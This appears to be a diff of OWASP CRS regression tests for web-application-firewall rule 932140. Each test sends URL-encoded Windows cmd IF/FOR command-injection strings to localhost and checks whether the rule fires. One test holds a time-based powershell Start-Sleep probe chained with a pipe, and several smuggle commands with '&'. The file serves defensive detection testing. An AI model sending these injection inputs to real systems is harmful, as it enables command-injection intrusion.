- version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-119 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-120 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-121 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-122 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-123 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-124 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-125 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-126 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-127 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-128 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-129 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-130 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-131 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-132 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - 
output: - log_contains: id "932140" - - test_title: 932140-133 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-134 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-135 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-136 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-137 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-138 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-139 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-140 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-141 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=if+not+%251+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-142 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-143 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-144 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-145 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-146 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-147 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-148 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-149 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-150 - desc: imported test - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-151 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-152 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-153 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-154 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=ifq+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - 
test_title: 932140-155 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=iffoo+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-156 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-157 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-158 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 10 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 11 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 12 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 13 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 14 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 15 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 
+ headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 16 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 17 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 18 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 19 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + 
- test_id: 20 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 21 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 22 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 23 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 24 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + 
expect_ids: [932140] + - test_id: 25 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 26 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 27 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 28 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 29 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 30 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 31 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 32 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 33 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 34 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + 
